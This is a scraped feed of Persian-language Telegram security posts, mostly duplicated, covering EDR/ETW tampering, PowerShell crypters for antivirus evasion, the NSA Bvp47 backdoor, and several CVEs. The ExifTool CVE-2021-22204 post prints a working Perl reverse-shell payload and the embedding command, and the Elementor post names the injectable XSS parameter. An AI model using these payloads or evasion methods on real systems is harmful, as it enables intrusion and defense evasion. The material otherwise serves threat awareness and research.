Media is too big
VIEW IN TELEGRAM
#Attack on #Windows Defender #ETW #Sessions
همانطور که میدونید بسیاری از EDR ها از Event Tracing for Windows استفاده میکنند برای دریافت رویداد های سیستم عامل و با تحلیل شاخصه های رفتاری یا Indicator of Behavior ، امکان شناسایی و پاسخ به حادثه مهیا خواهد شد.
اما نکته که میتونه جالب توجه باشه اینه که این ویژگی در سطح هسته، آسیب پذیر هم میتونه باشه و اگر مهاجم بتونه اون رو از کار بندازه، عملا دیگه محصولاتی از جمله EDR نخواهند توانست به ماهیت عملکردی خودشون ادامه بدهند، در نظر داشته باشید که EDR ها در طراحی خودشون بسیار از API های ETW در سطح هسته بهره میبرند.
در کنفرانس BlackHat 2021 ارائه ای انجام شد، راجب بدافزار های که امکان خاموش کردن ETW یا پاک کردن نشست اقدام کنند و بی آنکه مکانیزم های دفاعی سطح هسته مثل KPP بتونند رهگیری ای و مقاومت از خودشون نشون بدن.
فرایند های حمله به NT Kernel Logger Session مطرح شده است بطوری که مانیتور کردن یک Process رو کاملا مختل خواهد کرد. حمله دوم متمرکز بر ETW Logger Session خواهد بود که مبتنی بر Windows Defender فعال میشه.
@Unk9vvN
همانطور که میدونید بسیاری از EDR ها از Event Tracing for Windows استفاده میکنند برای دریافت رویداد های سیستم عامل و با تحلیل شاخصه های رفتاری یا Indicator of Behavior ، امکان شناسایی و پاسخ به حادثه مهیا خواهد شد.
اما نکته که میتونه جالب توجه باشه اینه که این ویژگی در سطح هسته، آسیب پذیر هم میتونه باشه و اگر مهاجم بتونه اون رو از کار بندازه، عملا دیگه محصولاتی از جمله EDR نخواهند توانست به ماهیت عملکردی خودشون ادامه بدهند، در نظر داشته باشید که EDR ها در طراحی خودشون بسیار از API های ETW در سطح هسته بهره میبرند.
در کنفرانس BlackHat 2021 ارائه ای انجام شد، راجب بدافزار های که امکان خاموش کردن ETW یا پاک کردن نشست اقدام کنند و بی آنکه مکانیزم های دفاعی سطح هسته مثل KPP بتونند رهگیری ای و مقاومت از خودشون نشون بدن.
فرایند های حمله به NT Kernel Logger Session مطرح شده است بطوری که مانیتور کردن یک Process رو کاملا مختل خواهد کرد. حمله دوم متمرکز بر ETW Logger Session خواهد بود که مبتنی بر Windows Defender فعال میشه.
@Unk9vvN
#IoB #APT #Iranian
شاخه رفتاری چیست؟ شاخصه رفتاری یا Indicator of Behavior به معنی رصد و شناسایی ای است که، مبتنی بر رفتار تاکتیکی و تکنیکی کد مندرج در فایل های مخرب (IoC) قرار دارد.
گاه مهاجمان #APT اقدام به رفتار غیر حرفه ای میکنند و کد های مورد استفاده در حملات خود را در فضاهای عمومی مثل gist یا pastebin و غیره، که با نام مستعار یا حساب کاربری اصلی خود فعال است، منتشر میسازند.
همین موضوع موجب شناسایی اونها بدست شرکت های فعال در حوزه جرم شناسی دیجیتال میشود، برای مثال در گزارش شرکت cybereason یکی از نام هاي کاربری مورد استفاده مهاجم را بررسی کرده و نمونه کد منتشر شده بدست وی را با معادل آن در فایل های مخرب استفاده شده در حمله تطبیق داده و از این روی منشع حمله و کشور آنرا شناسایی کرده است.
https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage
@Unk9vvN
شاخه رفتاری چیست؟ شاخصه رفتاری یا Indicator of Behavior به معنی رصد و شناسایی ای است که، مبتنی بر رفتار تاکتیکی و تکنیکی کد مندرج در فایل های مخرب (IoC) قرار دارد.
گاه مهاجمان #APT اقدام به رفتار غیر حرفه ای میکنند و کد های مورد استفاده در حملات خود را در فضاهای عمومی مثل gist یا pastebin و غیره، که با نام مستعار یا حساب کاربری اصلی خود فعال است، منتشر میسازند.
همین موضوع موجب شناسایی اونها بدست شرکت های فعال در حوزه جرم شناسی دیجیتال میشود، برای مثال در گزارش شرکت cybereason یکی از نام هاي کاربری مورد استفاده مهاجم را بررسی کرده و نمونه کد منتشر شده بدست وی را با معادل آن در فایل های مخرب استفاده شده در حمله تطبیق داده و از این روی منشع حمله و کشور آنرا شناسایی کرده است.
https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage
@Unk9vvN
#Bvp47 #Top_Tier #Backdoor of #NSA
یکی از آزمایشگاه های تحلیل بدافزار کشور چین که با نام Pangu فعالیت داره. گزارشی رو منتشر کرده مبنی بر Backdoor هایی که سازمان NSA آمریکا در سیستم عامل های لینوکس پایه قرار داده بوده و خب در جریان افشا گری های ادوارد اسنودن بهش اشاره شده
این Backdoor مبتنی بر کانال ارتباطی TCP SYN پکت ها فعال میشده و کد طراحی اون هم در سیستم عامل مخفی و مبهم سازی شده، نکته دیگر این Backdoor دستوری با نام
نکات و مطالب زیادی در مقاله گفته شده که ارجاع میدم خودتون مطالعه کنید، اما یکی از نکاتی که جالبه اینه که در لیست قربانی های این Backdoor یک قربانی ایرانی هم مطرح شده که در تصاویر پست مشاهده میکنید، قربانی laleh.itrc.ac.ir هستش که این دامنه مربوطه به پژوهشگاه ارتباطات و فناوری اطلاعات
نکته تامل برانگیز این است که پژوهشگاه فاوا که میبایست پیشتاز در فعالیت های تحقیقاتی حوزه علوم سایبری باشد، خود قربانی سازمان NSA بوده.
Reference
@Unk9vvN
یکی از آزمایشگاه های تحلیل بدافزار کشور چین که با نام Pangu فعالیت داره. گزارشی رو منتشر کرده مبنی بر Backdoor هایی که سازمان NSA آمریکا در سیستم عامل های لینوکس پایه قرار داده بوده و خب در جریان افشا گری های ادوارد اسنودن بهش اشاره شده
این Backdoor مبتنی بر کانال ارتباطی TCP SYN پکت ها فعال میشده و کد طراحی اون هم در سیستم عامل مخفی و مبهم سازی شده، نکته دیگر این Backdoor دستوری با نام
Bvp هستش که از نو String بوده و به عنوان Private Key میتونسته Backdoor مربوطه رو بصورت از راه دور متصل کنهنکات و مطالب زیادی در مقاله گفته شده که ارجاع میدم خودتون مطالعه کنید، اما یکی از نکاتی که جالبه اینه که در لیست قربانی های این Backdoor یک قربانی ایرانی هم مطرح شده که در تصاویر پست مشاهده میکنید، قربانی laleh.itrc.ac.ir هستش که این دامنه مربوطه به پژوهشگاه ارتباطات و فناوری اطلاعات
نکته تامل برانگیز این است که پژوهشگاه فاوا که میبایست پیشتاز در فعالیت های تحقیقاتی حوزه علوم سایبری باشد، خود قربانی سازمان NSA بوده.
Reference
@Unk9vvN
#Defense_Evasion #Powershell_Crypter
در روش های سنتی سالهای دور همواره استفاده از تکنیک رمزنگاری شلکد اصلی و بازگردانی آن در حافظه به واسطه تعریف یک stub محبوب ترین روشی بود که برای دور زدن آنتی ویروس ها استفاده میشد،
اما امروزه اون تکنیک های PE Injection که بر بستر فایل فرمت PE عملیاتی میشد، نمیتونه روش خوبی برای دور زدن مکانیزم های شناسایی کننده باشه، اما این روش در مواجه با روش های Stageless امکان بکارگیری مجدد رو داره، و همین موضوع میتونه محل مؤثری برای Evasion کردن ابزارهای محبوبی مثل Mimikatz باشه،
اگر به کد پاورشلی تصویر مربوط به تعریف رمزنگاری CBC نگاه کنید میبینید که باز هم اسکریپت ورودی هکر بعد از یک دور فشرده شدن با Gzip میره برای رمز شدن به واسطه تعریف یک Cipher key بر مبنای یک IV Padding و معماری رمزنگاری CBC یا ECB
در تصویر دوم هم تعریف یک stub در اسکریپت خروجی رو مشاهده میکنید که به محض بارگذاری کد بر روی حافظه عملیات بازگردانی رمزنگاری رو انجام داده و اسکریپت مد نظر رو به اجرا در میاره،
https://github.com/the-xentropy/xencrypt
@Unk9vvN
در روش های سنتی سالهای دور همواره استفاده از تکنیک رمزنگاری شلکد اصلی و بازگردانی آن در حافظه به واسطه تعریف یک stub محبوب ترین روشی بود که برای دور زدن آنتی ویروس ها استفاده میشد،
اما امروزه اون تکنیک های PE Injection که بر بستر فایل فرمت PE عملیاتی میشد، نمیتونه روش خوبی برای دور زدن مکانیزم های شناسایی کننده باشه، اما این روش در مواجه با روش های Stageless امکان بکارگیری مجدد رو داره، و همین موضوع میتونه محل مؤثری برای Evasion کردن ابزارهای محبوبی مثل Mimikatz باشه،
اگر به کد پاورشلی تصویر مربوط به تعریف رمزنگاری CBC نگاه کنید میبینید که باز هم اسکریپت ورودی هکر بعد از یک دور فشرده شدن با Gzip میره برای رمز شدن به واسطه تعریف یک Cipher key بر مبنای یک IV Padding و معماری رمزنگاری CBC یا ECB
در تصویر دوم هم تعریف یک stub در اسکریپت خروجی رو مشاهده میکنید که به محض بارگذاری کد بر روی حافظه عملیات بازگردانی رمزنگاری رو انجام داده و اسکریپت مد نظر رو به اجرا در میاره،
https://github.com/the-xentropy/xencrypt
@Unk9vvN
#CVE-2021-22204 #VirusTotal #RCE
مثل اینکه سرویس آنلاین VirusTotal از ابزار Exiftool استفاده میکرده که برای این ابزار، در خصوص پارس فایل فرمت DjVu یک آسیب پذیری RCE با شناسه CVE-2021-22204 ثبت شده بوده که بدلیل بروز رسانی نکردن ابزار، بر روی سرور VirusTotal این وبسایت مورد نفوذ قرار گرفته است.
$
@Unk9vvN
مثل اینکه سرویس آنلاین VirusTotal از ابزار Exiftool استفاده میکرده که برای این ابزار، در خصوص پارس فایل فرمت DjVu یک آسیب پذیری RCE با شناسه CVE-2021-22204 ثبت شده بوده که بدلیل بروز رسانی نکردن ابزار، بر روی سرور VirusTotal این وبسایت مورد نفوذ قرار گرفته است.
(metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(9999,inet_aton('localhost')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};#")
کاری که فایل بارگزاری شده انجام میدهد این است که ما یک تگ جدید روی فایل با نام HasselbladExif و بایت های 0xc51b بنویسیم تا آن را در فایل جدید خود شناسایی کنیم. سپس میتوانیم آن را در داخل هر فایلی قرار دهیم. در نهایت فایل آماده djvu, را با فایل فرمت دیگری مثل JPEG ترکیب میکنیم که اینبار بواسطه Exiftool انجام میشه.$
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg
https://www.cysrc.com/blog/virus-total-blog/@Unk9vvN
#ALPACA (Application Layer Protocol Confusion Attack)
در مقاله ای از دانشگاه Ruhr و Munster یک ارائه مطرح شده مبنی بر ALPACA که مشخص میکنه بواسطه ایجاد یک مهاجم مرد میانی اجازه میدهد تا ترافیک TLS را به یک نقطه پایانی سرویس TLS دیگر در آدرس IP و یا پورت دیگری هدایت کند.
به عنوان مثال، اگر زیردامنهها یک گواهی نامه عام را به اشتراک بگذارند، مهاجم میتواند ترافیک را از یک زیر دامنه به زیر دامنه دیگر هدایت کند و در نتیجه یک جلسه TLS معتبر ایجاد شود. این امر احراز هویت TLS را نقض میکند و حملات متقابل پروتکل ممکن است در مواردی که رفتار یک سرویس ممکن است امنیت سرویس دیگر را در لایه برنامه به خطر بیندازد.
یک مطالعه موردی سیستماتیک روی سرورهای وب انجام شده، درخواستهای HTTPS را از مرورگر وب قربانی به سرورهای SMTP، IMAP، POP3 و FTP هدایت میشود و ما نشان داده میشه که در سناریو های واقعی، مهاجم میتواند کوکیهای جلسه و سایر دادههای کار کاربر خصوصی را استخراج کند یا جاوا اسکریپت دلخواه را در زمینه وب سرور آسیبپذیر اجرا کند، بنابراین TLS و امنیت برنامه وب را دور میزند.
Reference
@Unk9vvN
در مقاله ای از دانشگاه Ruhr و Munster یک ارائه مطرح شده مبنی بر ALPACA که مشخص میکنه بواسطه ایجاد یک مهاجم مرد میانی اجازه میدهد تا ترافیک TLS را به یک نقطه پایانی سرویس TLS دیگر در آدرس IP و یا پورت دیگری هدایت کند.
به عنوان مثال، اگر زیردامنهها یک گواهی نامه عام را به اشتراک بگذارند، مهاجم میتواند ترافیک را از یک زیر دامنه به زیر دامنه دیگر هدایت کند و در نتیجه یک جلسه TLS معتبر ایجاد شود. این امر احراز هویت TLS را نقض میکند و حملات متقابل پروتکل ممکن است در مواردی که رفتار یک سرویس ممکن است امنیت سرویس دیگر را در لایه برنامه به خطر بیندازد.
یک مطالعه موردی سیستماتیک روی سرورهای وب انجام شده، درخواستهای HTTPS را از مرورگر وب قربانی به سرورهای SMTP، IMAP، POP3 و FTP هدایت میشود و ما نشان داده میشه که در سناریو های واقعی، مهاجم میتواند کوکیهای جلسه و سایر دادههای کار کاربر خصوصی را استخراج کند یا جاوا اسکریپت دلخواه را در زمینه وب سرور آسیبپذیر اجرا کند، بنابراین TLS و امنیت برنامه وب را دور میزند.
Reference
@Unk9vvN
#SharePoint #Deserialize #Vulnerability
نمونه ای از آسیب پذیری Deserialize در Functionality های پارس مقادیر sk یا Session Key که منجر به اجرای کد از راه دور میشود،
این آسیب پذیری روی نسخه های ۲۰۱۹ ، ۲۰۱۶ و ۲۰۱۳ وجود داشته و با شناسه CVE-2022-22005 ثبت شده است، فرایند اعمال وصله مایکروسافت در نسخه های قبلی دور زده شده و شروطی که برای تصدیق عدم وجود Object های خطرناک به درستی طراحی نشده است،
مدت دو ساله که محققین تست نفوذ وب تمرکز خودشون رو در خصوص دور زدن فیلترینگ ها و اعمال تصدیق های مایکروسافت بر روی آسیب پذیری هایی مانند Deserialization و SSRF و Directory Traversal گذاشته اند و اغلب موفق هم بوده اند،
یکی از عوامل موفقیت و جذابیت این آسیب پذیری ها، دسترسی به منابع کد سرویس های مایکروسافتی بوده و همچنین ماهیت این آسیب پذیری ها در حملات #APT بسیار مهم و نقش آفرین است...
https://hnd3884.github.io/posts/cve-2022-22005-microsoft-sharepoint-RCE/
@Unk9vvN
نمونه ای از آسیب پذیری Deserialize در Functionality های پارس مقادیر sk یا Session Key که منجر به اجرای کد از راه دور میشود،
این آسیب پذیری روی نسخه های ۲۰۱۹ ، ۲۰۱۶ و ۲۰۱۳ وجود داشته و با شناسه CVE-2022-22005 ثبت شده است، فرایند اعمال وصله مایکروسافت در نسخه های قبلی دور زده شده و شروطی که برای تصدیق عدم وجود Object های خطرناک به درستی طراحی نشده است،
مدت دو ساله که محققین تست نفوذ وب تمرکز خودشون رو در خصوص دور زدن فیلترینگ ها و اعمال تصدیق های مایکروسافت بر روی آسیب پذیری هایی مانند Deserialization و SSRF و Directory Traversal گذاشته اند و اغلب موفق هم بوده اند،
یکی از عوامل موفقیت و جذابیت این آسیب پذیری ها، دسترسی به منابع کد سرویس های مایکروسافتی بوده و همچنین ماهیت این آسیب پذیری ها در حملات #APT بسیار مهم و نقش آفرین است...
https://hnd3884.github.io/posts/cve-2022-22005-microsoft-sharepoint-RCE/
@Unk9vvN
#Elementor #XSS #Reflected #Vulnerability
مدت 4 ماهه که یک آسیب پذیری برای افزونه Elementor ثبت شده که از نسخه 1.5.0 تا 3.1.4 امکان رخدادش وجود داره.
این آسیب پذیری از نوع Reflected بوده که بصورت Unauthenticated امکان تزریق کد جاوا اسکریپت رو خواهد داشت، منطقه آسیب پذیر پارامتر settings در
آسیب پذیری در بخش یک switch قرار داره که میبایست نوع داده دریافتی رو مشخص کنه، در switch قرار داده شده نوع options یا میبایست video باشه یا image و یا slideshow ، اگر هیچ کدام اینها نبود بصورت default نوع محتوای options رو html در نظر خواهد گرفت که این یعنی تزریق کد جاوا اسکریپتی!
روش های بهره برداری از این نوع آسیب پذیری ها قالبا مبتنی بر مهندسی اجتماعی میتونه باشه، اگر مهاجم ایمیل فیشینگ مناسبی رو تهیه کرده باشه و بواسطه تحریک ادمین وبسایت، یک کلیک لینک بدزده، میتونه حمله CSRF خودش رو مبنی بر اضافه کردن ادمین ترتیب بده.
جالبه که این آسیب پذیری 4 ماهه روی برخی سایت های فعال در حوزه امنیت هم بچشم میخوره.
@Unk9vvN
مدت 4 ماهه که یک آسیب پذیری برای افزونه Elementor ثبت شده که از نسخه 1.5.0 تا 3.1.4 امکان رخدادش وجود داره.
این آسیب پذیری از نوع Reflected بوده که بصورت Unauthenticated امکان تزریق کد جاوا اسکریپت رو خواهد داشت، منطقه آسیب پذیر پارامتر settings در
#elementor-action:action=lightbox&settings= هستش که مقدار Base64 شده دریافت میکنه و نوع محتوا JSON هستش،آسیب پذیری در بخش یک switch قرار داره که میبایست نوع داده دریافتی رو مشخص کنه، در switch قرار داده شده نوع options یا میبایست video باشه یا image و یا slideshow ، اگر هیچ کدام اینها نبود بصورت default نوع محتوای options رو html در نظر خواهد گرفت که این یعنی تزریق کد جاوا اسکریپتی!
روش های بهره برداری از این نوع آسیب پذیری ها قالبا مبتنی بر مهندسی اجتماعی میتونه باشه، اگر مهاجم ایمیل فیشینگ مناسبی رو تهیه کرده باشه و بواسطه تحریک ادمین وبسایت، یک کلیک لینک بدزده، میتونه حمله CSRF خودش رو مبنی بر اضافه کردن ادمین ترتیب بده.
جالبه که این آسیب پذیری 4 ماهه روی برخی سایت های فعال در حوزه امنیت هم بچشم میخوره.
@Unk9vvN
#WinAPI #Threat_Hunting
یکی از مواردی که در بحث شکار تهدید میبایست ارزیابی و بررسی شود، مبحث استفاده ی از WinAPI سیستم عامل ویندوز میباشد،
در یک زنجیره حمله قالبا برای انجام ماموریت های بهره برداری یا ارتقاء سطح دسترسی و همچنین مواردی مانند ناشناس ماندن در مقابل مکانیزم های شناساسی کننده باشد.
در این خصوص یک وبسایت وجود داره به نام malapi.io که بسیاری از توابع API سیستم عامل، به شما نمایش میدهد و پتانسیل این توابع هم مطرح شده است که در کدام از مقطع یک حمله APT بکار گرفته شود.
برای مثال تابع GetModuleHandleW برای بکارگیری در فرآیند فراخوانی بارگیری شده باشد. این تابع اغلب همراه با GetProcAddress برای بازیابی پویا آدرس یک تابع برای اهداف فرار از شناسایی استفاده می شود.
malapi.io
@Unk9vvN
یکی از مواردی که در بحث شکار تهدید میبایست ارزیابی و بررسی شود، مبحث استفاده ی از WinAPI سیستم عامل ویندوز میباشد،
در یک زنجیره حمله قالبا برای انجام ماموریت های بهره برداری یا ارتقاء سطح دسترسی و همچنین مواردی مانند ناشناس ماندن در مقابل مکانیزم های شناساسی کننده باشد.
در این خصوص یک وبسایت وجود داره به نام malapi.io که بسیاری از توابع API سیستم عامل، به شما نمایش میدهد و پتانسیل این توابع هم مطرح شده است که در کدام از مقطع یک حمله APT بکار گرفته شود.
برای مثال تابع GetModuleHandleW برای بکارگیری در فرآیند فراخوانی بارگیری شده باشد. این تابع اغلب همراه با GetProcAddress برای بازیابی پویا آدرس یک تابع برای اهداف فرار از شناسایی استفاده می شود.
malapi.io
@Unk9vvN
#OpenCTI #Cyber #Threat #Intelligence
ابزار OpenCTI یک پلتفرم منبع باز است که به سازمان ها امکان میدهد تیم های شکار تهدید، اکتشافات خود را در قالب IoC های طراحی شده با یکی دیگر به اشتراک بگذارند. این به منظور ایمن سازی سریع تمامی سازمان های مشارکت کننده است.
هدف ایجاد یک ابزار جامع است که به کاربران اجازه میدهد تا از اطلاعات فنی مانند (TTP و IoC) و غیر... استفاده کنند و در عین حال هر قسمت از اطلاعات را به SOC اصلی خود مرتبط کنند مانند (MISP و غیره)،همچنین این ماتریس تکنیکی و تاکتیکی مبتنی بر چهارچوب MITRE ATT&CK هماهنگ خواهند بود.
ساختار داده ها با استفاده از فرم و استانداردهای STIX2 طراحی شده است. در این ابزار از تکنولوژی هایی از جمله GraphQL API و UX بهره برده شده است. همچنین OpenCTI را میتوان با ابزارها و برنامه های کاربردی دیگری مانند MISP، TheHive، MITRE ATT&CK و ... ادغام کرد.
https://github.com/OpenCTI-Platform/opencti
@Unk9vvN
ابزار OpenCTI یک پلتفرم منبع باز است که به سازمان ها امکان میدهد تیم های شکار تهدید، اکتشافات خود را در قالب IoC های طراحی شده با یکی دیگر به اشتراک بگذارند. این به منظور ایمن سازی سریع تمامی سازمان های مشارکت کننده است.
هدف ایجاد یک ابزار جامع است که به کاربران اجازه میدهد تا از اطلاعات فنی مانند (TTP و IoC) و غیر... استفاده کنند و در عین حال هر قسمت از اطلاعات را به SOC اصلی خود مرتبط کنند مانند (MISP و غیره)،همچنین این ماتریس تکنیکی و تاکتیکی مبتنی بر چهارچوب MITRE ATT&CK هماهنگ خواهند بود.
ساختار داده ها با استفاده از فرم و استانداردهای STIX2 طراحی شده است. در این ابزار از تکنولوژی هایی از جمله GraphQL API و UX بهره برده شده است. همچنین OpenCTI را میتوان با ابزارها و برنامه های کاربردی دیگری مانند MISP، TheHive، MITRE ATT&CK و ... ادغام کرد.
https://github.com/OpenCTI-Platform/opencti
@Unk9vvN